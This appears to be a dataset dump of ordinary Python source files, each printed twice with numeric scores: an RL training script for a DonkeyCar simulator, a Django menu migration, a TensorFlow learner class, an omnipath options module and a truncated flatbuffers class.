import argparse as arp import os import numpy as np from reinforcement_learning import logger from reinforcement_learning.gym.envs.donkey_car.donkey_env import DonkeyEnv from reinforcement_learning.common.callbacks import CheckpointCallback from reinforcement_learning.common.vec_env.subproc_vec_env import SubprocVecEnv from reinforcement_learning.sac.policies import MlpPolicy, CnnPolicy from reinforcement_learning.sac.sac import SAC as sac from on_policy_experiments import generate_traj, find_checkpoint_with_highest_explained_variance def make_env(env_class, *args): fn = lambda: env_class(*args) return fn if __name__ == '__main__': parser = arp.ArgumentParser(description='Test state-of-art RL alghorithms in OpenAI gym') parser.add_argument('-e', '--env', help='Environment index', type=int, default=1) parser.add_argument('-s', '--steps', help='Number of episode steps', type=int, default=256) parser.add_argument('-u', '--updates', help='Number of updates', type=int, default=10000) parser.add_argument('-a', '--algorithm', help='RL algorithm index', type=int, default=0) parser.add_argument('-o', '--output', help='Output directory', default='models') parser.add_argument('-c', '--cuda', help='Use CUDA', default=False, type=bool) parser.add_argument('-t', '--trainer', help='Expert model', default='SAC/MlpPolicy_expert') args = parser.parse_args() if not args.cuda: os.environ["CUDA_VISIBLE_DEVICES"] = "-1" env_class = DonkeyEnv conf = {'exe_path': '/home/mizolotu/DonkeyCar/donkey_sim.x86_64', 'port': 9091} level = 'generated_track' algorithm = sac policy = [CnnPolicy, MlpPolicy][args.env] totalsteps = args.steps * args.updates env_fns = [make_env(env_class, level, conf, args.env)] env = SubprocVecEnv(env_fns) logdir = f'{args.output}/{env_class.__name__}_{args.env}/{algorithm.__name__}/{policy.__name__}/' format_strs = os.getenv('', 'stdout,log,csv').split(',') logger.configure(os.path.abspath(logdir), format_strs) model = algorithm(policy, env, n_steps=args.steps, verbose=1) cb = CheckpointCallback(args.steps, logdir, verbose=1) model.learn(total_timesteps=totalsteps, callback=cb)
train_expert_donkey.py
import argparse as arp import os import numpy as np from reinforcement_learning import logger from reinforcement_learning.gym.envs.donkey_car.donkey_env import DonkeyEnv from reinforcement_learning.common.callbacks import CheckpointCallback from reinforcement_learning.common.vec_env.subproc_vec_env import SubprocVecEnv from reinforcement_learning.sac.policies import MlpPolicy, CnnPolicy from reinforcement_learning.sac.sac import SAC as sac from on_policy_experiments import generate_traj, find_checkpoint_with_highest_explained_variance def make_env(env_class, *args): fn = lambda: env_class(*args) return fn if __name__ == '__main__': parser = arp.ArgumentParser(description='Test state-of-art RL alghorithms in OpenAI gym') parser.add_argument('-e', '--env', help='Environment index', type=int, default=1) parser.add_argument('-s', '--steps', help='Number of episode steps', type=int, default=256) parser.add_argument('-u', '--updates', help='Number of updates', type=int, default=10000) parser.add_argument('-a', '--algorithm', help='RL algorithm index', type=int, default=0) parser.add_argument('-o', '--output', help='Output directory', default='models') parser.add_argument('-c', '--cuda', help='Use CUDA', default=False, type=bool) parser.add_argument('-t', '--trainer', help='Expert model', default='SAC/MlpPolicy_expert') args = parser.parse_args() if not args.cuda: os.environ["CUDA_VISIBLE_DEVICES"] = "-1" env_class = DonkeyEnv conf = {'exe_path': '/home/mizolotu/DonkeyCar/donkey_sim.x86_64', 'port': 9091} level = 'generated_track' algorithm = sac policy = [CnnPolicy, MlpPolicy][args.env] totalsteps = args.steps * args.updates env_fns = [make_env(env_class, level, conf, args.env)] env = SubprocVecEnv(env_fns) logdir = f'{args.output}/{env_class.__name__}_{args.env}/{algorithm.__name__}/{policy.__name__}/' format_strs = os.getenv('', 'stdout,log,csv').split(',') logger.configure(os.path.abspath(logdir), format_strs) model = algorithm(policy, env, n_steps=args.steps, verbose=1) cb = CheckpointCallback(args.steps, logdir, verbose=1) model.learn(total_timesteps=totalsteps, callback=cb)
0.452536
0.200323
from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='MenuDetail', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('type_name', models.TextField(verbose_name='Menu Type')), ('category', models.TextField(verbose_name='Category')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ], options={ 'verbose_name': 'MenuType', 'verbose_name_plural': 'MenuTypes', }, ), migrations.CreateModel( name='Table', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.TextField(verbose_name='Table')), ('capacity', models.IntegerField(verbose_name='Capacity')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ], options={ 'verbose_name': 'Table', 'verbose_name_plural': 'Tables', }, ), migrations.CreateModel( name='Menu', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.TextField(verbose_name='Menu name')), ('quanitity', models.TextField(verbose_name='Quanitity')), ('price', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Price')), ('description', models.TextField(verbose_name='Description')), ('taste', models.TextField(verbose_name='Taste')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.MenuDetail', verbose_name='Type')), ], options={ 'verbose_name': 'Menu', 'verbose_name_plural': 'Menu', }, ), ]
core/migrations/0001_initial.py
from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='MenuDetail', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('type_name', models.TextField(verbose_name='Menu Type')), ('category', models.TextField(verbose_name='Category')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ], options={ 'verbose_name': 'MenuType', 'verbose_name_plural': 'MenuTypes', }, ), migrations.CreateModel( name='Table', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.TextField(verbose_name='Table')), ('capacity', models.IntegerField(verbose_name='Capacity')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ], options={ 'verbose_name': 'Table', 'verbose_name_plural': 'Tables', }, ), migrations.CreateModel( name='Menu', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.TextField(verbose_name='Menu name')), ('quanitity', models.TextField(verbose_name='Quanitity')), ('price', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Price')), ('description', models.TextField(verbose_name='Description')), ('taste', models.TextField(verbose_name='Taste')), ('created', models.DateTimeField(auto_now_add=True, verbose_name='created')), ('modified', models.DateTimeField(auto_now=True, verbose_name='modified')), ('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.MenuDetail', verbose_name='Type')), ], options={ 'verbose_name': 'Menu', 'verbose_name_plural': 'Menu', }, ), ]
0.510496
0.140248
import os.path from typing import List, Optional, Tuple import tensorflow as tf from mlagents_envs.side_channel.engine_configuration_channel import EngineConfigurationChannel # type: ignore from mlagents_envs.side_channel.environment_parameters_channel import EnvironmentParametersChannel # type: ignore from tensorflow.keras import activations, optimizers from tensorflow.keras.layers import Layer, Concatenate, Dense from utils.config import ConfigShell from environment import Environment CONFIG_FILE = "config.csv" PROJECT_HOME = os.path.dirname(__file__) def draw_tensorboard(episode: int, time_step: int, logdir: str): writer = tf.summary.create_file_writer(logdir) with writer.as_default(): tf.summary.scalar("Duration/Episode", time_step, step=episode) class Learner: def __init__( self, agent, network, optimizer: Optional[optimizers.Optimizer] = optimizers.Adam( learning_rate=0.0001, clipnorm=10.0 ), # Parmeters for initializing the network preprocessing_layers: Optional[List[Layer]] = [ Dense(50, activation=activations.softplus) ], preprocessing_combiner: Optional[Layer] = Concatenate(axis=-1), conv_layer_params: Optional[List[Tuple[int]]] = [(8, 5, 2), (16, 3, 1)], fc_layer_params: Optional[List[int]] = None, activation_fn: Optional[Layer] = activations.softplus, ): self.agent = agent self.network = network self.optimizer = optimizer # Parmeters for initializing the network self.fc_layer_params = fc_layer_params self.preprocessing_layers = preprocessing_layers self.preprocessing_combiner = preprocessing_combiner self.conv_layer_params = conv_layer_params self.activation_fn = activation_fn def configure(self) -> Tuple[dict, str, str, str]: """ Configure the learner. Returns: config: the configuration parameters. env_file: the environment file. logdir: the log directory. savedir: the save directory. """ # [1] Load configuration configsh = ConfigShell(CONFIG_FILE) config, env_file, logdir, savedir = configsh.get_path(PROJECT_HOME) # [2] GPU configuration gpus = tf.config.experimental.list_physical_devices("GPU") if gpus: try: # Currently, memory growth needs to be the same across GPUs for gpu in gpus: tf.config.experimental.set_memory_growth(gpu, True) logical_gpus = tf.config.experimental.list_logical_devices("GPU") print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs") except RuntimeError as e: # Memory growth must be set before GPUs have been initialized print(e) return config, env_file, logdir, savedir def initialize_env(self, config, env_file) -> Environment: """ Initialize the environment. Args: config: the configuration parameters. env_file: the environment file. Returns: env: Environment """ # [3] Environment configuration base_port = int(input("Enter base port: ")) time_scale = int(config.get("time_scale")) width = int(config.get("width")) height = int(config.get("height")) channel_config = EngineConfigurationChannel() channel_param = EnvironmentParametersChannel() env = Environment( file_name=env_file, base_port=base_port, side_channels=[channel_config, channel_param], ) channel_config.set_configuration_parameters( time_scale=time_scale, quality_level=1, width=width, height=height ) env.set_float_parameters(config) return env def initialize_agent(self, config, env): """ Initialize the agent. Args: config: the configuration parameters. env: Environment Returns: agent: Agent """ # [4] Agent configuration action_spec = env.action_spec observation_spec = env.observation_spec q_network = self.initialize_network(action_spec, observation_spec) optimizer = self.optimizer agent = self.agent( observation_spec, action_spec, q_network, optimizer, epsilon=config.get("epsilon", 1.0), target_update_period=config.get("target_update_period", 5000), gamma=config.get("gamma", 0.95), reward_shaping=True if config.get("reward_shaping", True) else False, batch_size=config.get("batch_size", 12), epsilon_start=config.get("epsilon_start", 0.8), epsilon_end=config.get("epsilon_end", 0.1), exploration_steps=config.get("exploration_steps", 209000), ) return agent def initialize_network(self, action_spec, observation_spec) -> tf.keras.Model: """ Initialize the network. Args: action_spec: ActionSpec observation_spec: ObservationSpec Returns: network: Network """ preprocessing_layers = self.preprocessing_layers preprocessing_combiner = self.preprocessing_combiner conv_layer_params = self.conv_layer_params fc_layer_params = self.fc_layer_params activation_fn = self.activation_fn q_network = self.network( observation_spec, action_spec, preprocessing_layers=preprocessing_layers, preprocessing_combiner=preprocessing_combiner, conv_layer_params=conv_layer_params, fc_layer_params=fc_layer_params, activation_fn=activation_fn, ) return q_network def run(self): config, env_file, logdir, savedir = self.configure() env = self.initialize_env(config, env_file) agent = self.initialize_agent(config, env) # [5] Training max_time_step = int(config.get("max_time_step")) train_start = int(config.get("train_start", 1000)) n_episode = int(config.get("n_episode", 2000)) global_step = 0 survival_time_steps = [0] * n_episode print("Training...") for episode in range(n_episode): time_step = 0 observations, done = env.reset() while not done and time_step < max_time_step: time_step += 1 global_step += 1 debug_log = f"Episode: {episode}/{n_episode} " debug_log += f"Global step: {global_step} " debug_log += f"Time step: {time_step} " debug_log += f"Epsilon: {agent._epsilon:.5f} " print(debug_log, end="") action = agent.step(observations) next_observations, done = env.step(action) reward = agent.get_reward(observations, action, next_observations, done) agent.append(observations, action, reward, next_observations, done) if len(agent.memory) > train_start: agent.train() if global_step % agent._target_update_period == 0: agent.update_target_model() observations = next_observations.copy() if done: print( "Episode {} finished after {} time steps".format(episode, time_step) ) survival_time_steps[episode] = time_step draw_tensorboard(episode, time_step, logdir) if episode % 10 == 0: agent.save(f"{savedir}/ckpt_{episode}") env.close() print("Training finished") class LearnerPrev(Learner): def __init__( self, agent, network, optimizer: Optional[optimizers.Optimizer] = optimizers.Adam( learning_rate=0.0001, clipnorm=10 ), ): self.agent = agent self.network = network self.optimizer = optimizer def initialize_network(self, action_spec, observation_spec): q_network = self.network(action_spec, (64, 64, 6), (2,)) return q_network if __name__ == "__main__": pass
project/learner.py
import os.path from typing import List, Optional, Tuple import tensorflow as tf from mlagents_envs.side_channel.engine_configuration_channel import EngineConfigurationChannel # type: ignore from mlagents_envs.side_channel.environment_parameters_channel import EnvironmentParametersChannel # type: ignore from tensorflow.keras import activations, optimizers from tensorflow.keras.layers import Layer, Concatenate, Dense from utils.config import ConfigShell from environment import Environment CONFIG_FILE = "config.csv" PROJECT_HOME = os.path.dirname(__file__) def draw_tensorboard(episode: int, time_step: int, logdir: str): writer = tf.summary.create_file_writer(logdir) with writer.as_default(): tf.summary.scalar("Duration/Episode", time_step, step=episode) class Learner: def __init__( self, agent, network, optimizer: Optional[optimizers.Optimizer] = optimizers.Adam( learning_rate=0.0001, clipnorm=10.0 ), # Parmeters for initializing the network preprocessing_layers: Optional[List[Layer]] = [ Dense(50, activation=activations.softplus) ], preprocessing_combiner: Optional[Layer] = Concatenate(axis=-1), conv_layer_params: Optional[List[Tuple[int]]] = [(8, 5, 2), (16, 3, 1)], fc_layer_params: Optional[List[int]] = None, activation_fn: Optional[Layer] = activations.softplus, ): self.agent = agent self.network = network self.optimizer = optimizer # Parmeters for initializing the network self.fc_layer_params = fc_layer_params self.preprocessing_layers = preprocessing_layers self.preprocessing_combiner = preprocessing_combiner self.conv_layer_params = conv_layer_params self.activation_fn = activation_fn def configure(self) -> Tuple[dict, str, str, str]: """ Configure the learner. Returns: config: the configuration parameters. env_file: the environment file. logdir: the log directory. savedir: the save directory. """ # [1] Load configuration configsh = ConfigShell(CONFIG_FILE) config, env_file, logdir, savedir = configsh.get_path(PROJECT_HOME) # [2] GPU configuration gpus = tf.config.experimental.list_physical_devices("GPU") if gpus: try: # Currently, memory growth needs to be the same across GPUs for gpu in gpus: tf.config.experimental.set_memory_growth(gpu, True) logical_gpus = tf.config.experimental.list_logical_devices("GPU") print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs") except RuntimeError as e: # Memory growth must be set before GPUs have been initialized print(e) return config, env_file, logdir, savedir def initialize_env(self, config, env_file) -> Environment: """ Initialize the environment. Args: config: the configuration parameters. env_file: the environment file. Returns: env: Environment """ # [3] Environment configuration base_port = int(input("Enter base port: ")) time_scale = int(config.get("time_scale")) width = int(config.get("width")) height = int(config.get("height")) channel_config = EngineConfigurationChannel() channel_param = EnvironmentParametersChannel() env = Environment( file_name=env_file, base_port=base_port, side_channels=[channel_config, channel_param], ) channel_config.set_configuration_parameters( time_scale=time_scale, quality_level=1, width=width, height=height ) env.set_float_parameters(config) return env def initialize_agent(self, config, env): """ Initialize the agent. Args: config: the configuration parameters. env: Environment Returns: agent: Agent """ # [4] Agent configuration action_spec = env.action_spec observation_spec = env.observation_spec q_network = self.initialize_network(action_spec, observation_spec) optimizer = self.optimizer agent = self.agent( observation_spec, action_spec, q_network, optimizer, epsilon=config.get("epsilon", 1.0), target_update_period=config.get("target_update_period", 5000), gamma=config.get("gamma", 0.95), reward_shaping=True if config.get("reward_shaping", True) else False, batch_size=config.get("batch_size", 12), epsilon_start=config.get("epsilon_start", 0.8), epsilon_end=config.get("epsilon_end", 0.1), exploration_steps=config.get("exploration_steps", 209000), ) return agent def initialize_network(self, action_spec, observation_spec) -> tf.keras.Model: """ Initialize the network. Args: action_spec: ActionSpec observation_spec: ObservationSpec Returns: network: Network """ preprocessing_layers = self.preprocessing_layers preprocessing_combiner = self.preprocessing_combiner conv_layer_params = self.conv_layer_params fc_layer_params = self.fc_layer_params activation_fn = self.activation_fn q_network = self.network( observation_spec, action_spec, preprocessing_layers=preprocessing_layers, preprocessing_combiner=preprocessing_combiner, conv_layer_params=conv_layer_params, fc_layer_params=fc_layer_params, activation_fn=activation_fn, ) return q_network def run(self): config, env_file, logdir, savedir = self.configure() env = self.initialize_env(config, env_file) agent = self.initialize_agent(config, env) # [5] Training max_time_step = int(config.get("max_time_step")) train_start = int(config.get("train_start", 1000)) n_episode = int(config.get("n_episode", 2000)) global_step = 0 survival_time_steps = [0] * n_episode print("Training...") for episode in range(n_episode): time_step = 0 observations, done = env.reset() while not done and time_step < max_time_step: time_step += 1 global_step += 1 debug_log = f"Episode: {episode}/{n_episode} " debug_log += f"Global step: {global_step} " debug_log += f"Time step: {time_step} " debug_log += f"Epsilon: {agent._epsilon:.5f} " print(debug_log, end="") action = agent.step(observations) next_observations, done = env.step(action) reward = agent.get_reward(observations, action, next_observations, done) agent.append(observations, action, reward, next_observations, done) if len(agent.memory) > train_start: agent.train() if global_step % agent._target_update_period == 0: agent.update_target_model() observations = next_observations.copy() if done: print( "Episode {} finished after {} time steps".format(episode, time_step) ) survival_time_steps[episode] = time_step draw_tensorboard(episode, time_step, logdir) if episode % 10 == 0: agent.save(f"{savedir}/ckpt_{episode}") env.close() print("Training finished") class LearnerPrev(Learner): def __init__( self, agent, network, optimizer: Optional[optimizers.Optimizer] = optimizers.Adam( learning_rate=0.0001, clipnorm=10 ), ): self.agent = agent self.network = network self.optimizer = optimizer def initialize_network(self, action_spec, observation_spec): q_network = self.network(action_spec, (64, 64, 6), (2,)) return q_network if __name__ == "__main__": pass
0.885983
0.257888
from typing import Any, Union, ClassVar, NoReturn, Optional from pathlib import Path from urllib.parse import urlparse import configparser import attr from omnipath.constants import License from omnipath._core.cache._cache import Cache, FileCache, NoopCache, MemoryCache from omnipath.constants._pkg_constants import DEFAULT_OPTIONS def _is_positive(_instance, attribute: attr.Attribute, value: int) -> NoReturn: """Check whether the ``value`` is positive.""" if value <= 0: raise ValueError( f"Expected `{attribute.name}` to be positive, found `{value}`." ) def _is_non_negative(_instance, attribute: attr.Attribute, value: int) -> NoReturn: """Check whether the ``value`` is non-negative.""" if value < 0: raise ValueError( f"Expected `{attribute.name}` to be non-negative, found `{value}`." ) def _is_valid_url(_instance, _attribute: attr.Attribute, value: str) -> NoReturn: """Check whether the ``value`` forms a valid URL.""" pr = urlparse(value) if not pr.scheme or not pr.netloc: raise ValueError(f"Invalid URL: `{value}`.") def _cache_converter(value: Optional[Union[str, Path, Cache]]) -> Cache: """Convert ``value`` to :class:`omnipath._core.cache.Cache`.""" if isinstance(value, Cache): return value if value is None: return NoopCache() if value == "memory": return MemoryCache() return FileCache(value) @attr.s class Options: """ Class defining various :mod:`omnipath` options. Parameters ---------- url URL of the web service. license License to use when fetching the data. password <PASSWORD> when performing requests. cache Type of a cache. Valid options are: - `None`: do not save anything into a cache. - `'memory'`: cache files into the memory. - :class:`str`: persist files into a directory. autoload Whether to contact the server at ``url`` during import to get the server version and the most up-to-date query parameters and their valid options. convert_dtypes Whether to convert the data types of the resulting :class:`pandas.DataFrame`. num_retries Number of retries before giving up. timeout Timeout in seconds when awaiting response. chunk_size Size in bytes in which to read the data. progress_bar Whether to show the progress bar when downloading data. """ config_path: ClassVar[Path] = Path.home() / ".config" / "omnipathdb.ini" url: str = attr.ib( default=DEFAULT_OPTIONS.url, validator=[attr.validators.instance_of(str), _is_valid_url], on_setattr=attr.setters.validate, ) license: License = attr.ib( default=None, validator=attr.validators.optional(attr.validators.instance_of((str, License))), converter=(lambda l: None if l is None else License(l)), on_setattr=attr.setters.convert, ) password: Optional[str] = attr.ib( default=None, repr=False, validator=attr.validators.optional(attr.validators.instance_of(str)), on_setattr=attr.setters.validate, ) cache: Cache = attr.ib( default=DEFAULT_OPTIONS.cache_dir, converter=_cache_converter, kw_only=True, on_setattr=attr.setters.convert, ) autoload: bool = attr.ib( default=DEFAULT_OPTIONS.autoload, validator=attr.validators.instance_of(bool), on_setattr=attr.setters.validate, ) convert_dtypes: bool = attr.ib( default=DEFAULT_OPTIONS.convert_dtypes, validator=attr.validators.instance_of(bool), on_setattr=attr.setters.validate, ) num_retries: int = attr.ib( default=DEFAULT_OPTIONS.num_retries, validator=[attr.validators.instance_of(int), _is_non_negative], on_setattr=attr.setters.validate, ) timeout: Union[int, float] = attr.ib( default=DEFAULT_OPTIONS.timeout, validator=[attr.validators.instance_of((int, float)), _is_positive], on_setattr=attr.setters.validate, ) chunk_size: int = attr.ib( default=DEFAULT_OPTIONS.chunk_size, validator=[attr.validators.instance_of(int), _is_positive], on_setattr=attr.setters.validate, ) progress_bar: bool = attr.ib( default=True, repr=False, validator=attr.validators.instance_of(bool), on_setattr=attr.setters.validate, ) def _create_config(self, section: Optional[str] = None): section = self.url if section is None else section _is_valid_url(None, None, section) config = configparser.ConfigParser() # do not save the password config[section] = { "license": str(None if self.license is None else self.license.value), "cache_dir": str(self.cache.path), "autoload": self.autoload, "convert_dtypes": self.convert_dtypes, "num_retries": self.num_retries, "timeout": self.timeout, "chunk_size": self.chunk_size, "progress_bar": self.progress_bar, } return config @classmethod def from_config(cls, section: Optional[str] = None) -> "Options": """ Return the options from a configuration file. Parameters ---------- section Section of the `.ini` file from which to create the options. It corresponds to the URL of the server. If `None`, use default URL. Returns ------- :class:`omnipath._cores.utils.Options` The options. """ if not cls.config_path.is_file(): return cls().write() config = configparser.ConfigParser(default_section=DEFAULT_OPTIONS.url) config.read(cls.config_path) section = DEFAULT_OPTIONS.url if section is None else section _is_valid_url(None, None, section) _ = config.get(section, "cache_dir") cache = config.get(section, "cache_dir", fallback=DEFAULT_OPTIONS.cache_dir) cache = None if cache == "None" else cache license = config.get(section, "license", fallback=DEFAULT_OPTIONS.license) license = None if license == "None" else License(license) return cls( url=section, license=license, num_retries=config.getint( section, "num_retries", fallback=DEFAULT_OPTIONS.num_retries ), timeout=config.getfloat( section, "timeout", fallback=DEFAULT_OPTIONS.timeout ), chunk_size=config.getint( section, "chunk_size", fallback=DEFAULT_OPTIONS.chunk_size ), progress_bar=config.getboolean( section, "progress_bar", fallback=DEFAULT_OPTIONS.progress_bar ), autoload=config.getboolean( section, "autoload", fallback=DEFAULT_OPTIONS.autoload ), convert_dtypes=config.getboolean( section, "convert_dtypes", fallback=DEFAULT_OPTIONS.convert_dtypes ), cache=cache, ) @classmethod def from_options(cls, options: "Options", **kwargs: Any) -> "Options": """ Create new options from previous options. Parameters ---------- options Options from which to create new ones. **kwargs Keyword arguments overriding attributes from ``options``. Returns ------- The newly created option. """ if not isinstance(options, Options): raise TypeError( f"Expected `options` to be of type `Options`, found `{type(options)}`." ) kwargs = {k: v for k, v in kwargs.items() if hasattr(options, k)} return cls(**{**options.__dict__, **kwargs}) def write(self, section: Optional[str] = None) -> NoReturn: """Write the current options to a configuration file.""" self.config_path.parent.mkdir(parents=True, exist_ok=True) with open(self.config_path, "w") as fout: self._create_config(section).write(fout) return self def __enter__(self) -> "Options": return self.from_options(self) def __exit__(self, exc_type, exc_val, exc_tb) -> None: pass options = Options.from_config() __all__ = [options, Options]
omnipath/_core/utils/_options.py
from typing import Any, Union, ClassVar, NoReturn, Optional from pathlib import Path from urllib.parse import urlparse import configparser import attr from omnipath.constants import License from omnipath._core.cache._cache import Cache, FileCache, NoopCache, MemoryCache from omnipath.constants._pkg_constants import DEFAULT_OPTIONS def _is_positive(_instance, attribute: attr.Attribute, value: int) -> NoReturn: """Check whether the ``value`` is positive.""" if value <= 0: raise ValueError( f"Expected `{attribute.name}` to be positive, found `{value}`." ) def _is_non_negative(_instance, attribute: attr.Attribute, value: int) -> NoReturn: """Check whether the ``value`` is non-negative.""" if value < 0: raise ValueError( f"Expected `{attribute.name}` to be non-negative, found `{value}`." ) def _is_valid_url(_instance, _attribute: attr.Attribute, value: str) -> NoReturn: """Check whether the ``value`` forms a valid URL.""" pr = urlparse(value) if not pr.scheme or not pr.netloc: raise ValueError(f"Invalid URL: `{value}`.") def _cache_converter(value: Optional[Union[str, Path, Cache]]) -> Cache: """Convert ``value`` to :class:`omnipath._core.cache.Cache`.""" if isinstance(value, Cache): return value if value is None: return NoopCache() if value == "memory": return MemoryCache() return FileCache(value) @attr.s class Options: """ Class defining various :mod:`omnipath` options. Parameters ---------- url URL of the web service. license License to use when fetching the data. password <PASSWORD> when performing requests. cache Type of a cache. Valid options are: - `None`: do not save anything into a cache. - `'memory'`: cache files into the memory. - :class:`str`: persist files into a directory. autoload Whether to contact the server at ``url`` during import to get the server version and the most up-to-date query parameters and their valid options. convert_dtypes Whether to convert the data types of the resulting :class:`pandas.DataFrame`. num_retries Number of retries before giving up. timeout Timeout in seconds when awaiting response. chunk_size Size in bytes in which to read the data. progress_bar Whether to show the progress bar when downloading data. """ config_path: ClassVar[Path] = Path.home() / ".config" / "omnipathdb.ini" url: str = attr.ib( default=DEFAULT_OPTIONS.url, validator=[attr.validators.instance_of(str), _is_valid_url], on_setattr=attr.setters.validate, ) license: License = attr.ib( default=None, validator=attr.validators.optional(attr.validators.instance_of((str, License))), converter=(lambda l: None if l is None else License(l)), on_setattr=attr.setters.convert, ) password: Optional[str] = attr.ib( default=None, repr=False, validator=attr.validators.optional(attr.validators.instance_of(str)), on_setattr=attr.setters.validate, ) cache: Cache = attr.ib( default=DEFAULT_OPTIONS.cache_dir, converter=_cache_converter, kw_only=True, on_setattr=attr.setters.convert, ) autoload: bool = attr.ib( default=DEFAULT_OPTIONS.autoload, validator=attr.validators.instance_of(bool), on_setattr=attr.setters.validate, ) convert_dtypes: bool = attr.ib( default=DEFAULT_OPTIONS.convert_dtypes, validator=attr.validators.instance_of(bool), on_setattr=attr.setters.validate, ) num_retries: int = attr.ib( default=DEFAULT_OPTIONS.num_retries, validator=[attr.validators.instance_of(int), _is_non_negative], on_setattr=attr.setters.validate, ) timeout: Union[int, float] = attr.ib( default=DEFAULT_OPTIONS.timeout, validator=[attr.validators.instance_of((int, float)), _is_positive], on_setattr=attr.setters.validate, ) chunk_size: int = attr.ib( default=DEFAULT_OPTIONS.chunk_size, validator=[attr.validators.instance_of(int), _is_positive], on_setattr=attr.setters.validate, ) progress_bar: bool = attr.ib( default=True, repr=False, validator=attr.validators.instance_of(bool), on_setattr=attr.setters.validate, ) def _create_config(self, section: Optional[str] = None): section = self.url if section is None else section _is_valid_url(None, None, section) config = configparser.ConfigParser() # do not save the password config[section] = { "license": str(None if self.license is None else self.license.value), "cache_dir": str(self.cache.path), "autoload": self.autoload, "convert_dtypes": self.convert_dtypes, "num_retries": self.num_retries, "timeout": self.timeout, "chunk_size": self.chunk_size, "progress_bar": self.progress_bar, } return config @classmethod def from_config(cls, section: Optional[str] = None) -> "Options": """ Return the options from a configuration file. Parameters ---------- section Section of the `.ini` file from which to create the options. It corresponds to the URL of the server. If `None`, use default URL. Returns ------- :class:`omnipath._cores.utils.Options` The options. """ if not cls.config_path.is_file(): return cls().write() config = configparser.ConfigParser(default_section=DEFAULT_OPTIONS.url) config.read(cls.config_path) section = DEFAULT_OPTIONS.url if section is None else section _is_valid_url(None, None, section) _ = config.get(section, "cache_dir") cache = config.get(section, "cache_dir", fallback=DEFAULT_OPTIONS.cache_dir) cache = None if cache == "None" else cache license = config.get(section, "license", fallback=DEFAULT_OPTIONS.license) license = None if license == "None" else License(license) return cls( url=section, license=license, num_retries=config.getint( section, "num_retries", fallback=DEFAULT_OPTIONS.num_retries ), timeout=config.getfloat( section, "timeout", fallback=DEFAULT_OPTIONS.timeout ), chunk_size=config.getint( section, "chunk_size", fallback=DEFAULT_OPTIONS.chunk_size ), progress_bar=config.getboolean( section, "progress_bar", fallback=DEFAULT_OPTIONS.progress_bar ), autoload=config.getboolean( section, "autoload", fallback=DEFAULT_OPTIONS.autoload ), convert_dtypes=config.getboolean( section, "convert_dtypes", fallback=DEFAULT_OPTIONS.convert_dtypes ), cache=cache, ) @classmethod def from_options(cls, options: "Options", **kwargs: Any) -> "Options": """ Create new options from previous options. Parameters ---------- options Options from which to create new ones. **kwargs Keyword arguments overriding attributes from ``options``. Returns ------- The newly created option. """ if not isinstance(options, Options): raise TypeError( f"Expected `options` to be of type `Options`, found `{type(options)}`." ) kwargs = {k: v for k, v in kwargs.items() if hasattr(options, k)} return cls(**{**options.__dict__, **kwargs}) def write(self, section: Optional[str] = None) -> NoReturn: """Write the current options to a configuration file.""" self.config_path.parent.mkdir(parents=True, exist_ok=True) with open(self.config_path, "w") as fout: self._create_config(section).write(fout) return self def __enter__(self) -> "Options": return self.from_options(self) def __exit__(self, exc_type, exc_val, exc_tb) -> None: pass options = Options.from_config() __all__ = [options, Options]
0.944203
0.239572
# namespace: FBOutput import tdw.flatbuffers class AvatarSimpleBody(object): __slots__ = ['_tab'] @classmethod def GetRootAsAvatarSimpleBody(cls, buf, offset): n = tdw.flatbuffers.encode.Get(tdw.flatbuffers.packer.uoffset, buf, offset) x = AvatarSimpleBody() x.Init(buf, n + offset) return x # AvatarSimpleBody def Init(self, buf, pos): self._tab = tdw.flatbuffers.table.Table(buf, pos) # AvatarSimpleBody def Id(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4)) if o != 0: return self._tab.String(o + self._tab.Pos) return None # AvatarSimpleBody def Position(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) if o != 0: x = o + self._tab.Pos from .Vector3 import Vector3 obj = Vector3() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def Rotation(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8)) if o != 0: x = o + self._tab.Pos from .Quaternion import Quaternion obj = Quaternion() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def Forward(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10)) if o != 0: x = o + self._tab.Pos from .Vector3 import Vector3 obj = Vector3() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def Velocity(self): o = tdw.flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12)) if o != 0: x = o + self._tab.Pos from .Vector3 import Vector3 obj = Vector3() obj.Init(self._tab.Bytes, x) return obj return None # AvatarSimpleBody def AngularVelocity(self): o = 